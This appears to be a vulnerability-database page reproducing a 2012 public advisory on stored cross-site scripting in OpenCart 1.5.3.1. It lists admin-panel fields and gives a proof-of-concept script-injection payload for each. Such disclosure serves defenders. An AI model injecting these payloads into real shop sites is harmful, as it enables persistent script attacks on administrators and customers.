Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenCart CMS Cross Site Scripting

🗓️ 23 Jun 2012 00:00:00Reported by $1l3n7 @$$@$$17Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

OpenCart CMS Multiple Stored XSS vulnerability in versions 1.5.3.1. Allows insertion of malicious scripts in attribute and option fields

Code
` _ _ _ _____ _____ ____ _ _ ____ _ _ _ _____  
| |/ | |___ / _ __|___ | / __ \ | | | | / __ \ | | | |/ |___ |  
/ __) | | |_ \| '_ \ / / / / _` / __) __)/ / _` / __) __) | / /  
\__ \ | |___) | | | |/ / | | (_| \__ \__ \ | (_| \__ \__ \ | / /  
( /_|_|____/|_| |_/_/ \ \__,_( ( /\ \__,_( ( /_|/_/  
|_| \____/ |_| |_| \____/ |_| |_|  
  
  
-------------------------------------------------------------------  
-------------------------------------------------------------------  
  
  
TITLE: OpenCart CMS Multiple Stored XSS  
Vendor: OpenCart CMS  
Author: $1l3n7 @$$@$$17  
Email: [email protected]  
Download Link: http://www.opencart.com/index.php?route=download/download  
Versions: 1.5.3.1  
Tested on: Windows 7  
  
  
-------------------------------------------------------------------  
-------------------------------------------------------------------  
Description: OpenCart is an open source PHP-based online shopping cart  
system. A robust e-commerce solution for Internet merchants  
with the ability to create their own online business and  
participate in e-commerce at a minimal cost. OpenCart is  
designed feature rich, easy to use, search engine friendly  
and with a visually appealing interface.  
-------------------------------------------------------------------  
-------------------------------------------------------------------  
  
  
Multiple Persistent XSS:  
  
DEMO:  
  
1:  
  
Select Catalog Drop Down -> Attribute Menu -> Select Attribute  
  
Select Insert Button  
  
In Attribute Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
Similarly  
  
Select Catalog Drop Down -> Attribute Menu -> Select Attribute Groups  
  
Select Insert Button  
  
In Attribute Group Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
2:  
  
Select Catalog Drop Down -> Select Options  
  
Select Insert Button  
  
In Option Name Field  
POST DATA= "'-->><script>alert(0)</script>  
  
  
-------------------------------------------------------------  
  
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jun 2012 00:00Current
7.4High risk
Vulners AI Score7.4
opencart cmsmultiple stored xssversions 1.5.3.1attribute menuattribute groupsoption name field
21